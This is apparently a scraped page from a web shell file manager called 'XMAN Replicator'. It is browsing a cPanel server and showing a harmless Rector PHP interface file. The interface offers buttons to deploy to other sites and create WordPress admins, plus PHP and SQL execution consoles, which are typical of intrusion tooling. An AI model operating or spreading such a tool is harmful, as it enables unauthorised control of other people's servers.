🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
rector
/
rector
/
src
/
PhpAttribute
/
Contract
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-11-08 13:59
🔄
🗑️
🗑️📁
⬇️
🔒
AnnotationToAttributeMapperInterface.php
352 B
-rw-r--r--
2024-11-08 13:59
✏️
🔄
🗑️
⬇️
🔒
View: AnnotationToAttributeMapperInterface.php
<?php declare (strict_types=1); namespace Rector\PhpAttribute\Contract; use PhpParser\Node\Expr; /** * @template T as mixed */ interface AnnotationToAttributeMapperInterface { /** * @param mixed $value */ public function isCandidate($value) : bool; /** * @param T $value */ public function map($value) : Expr; }
PHP Console
Execute
SQL Console
Execute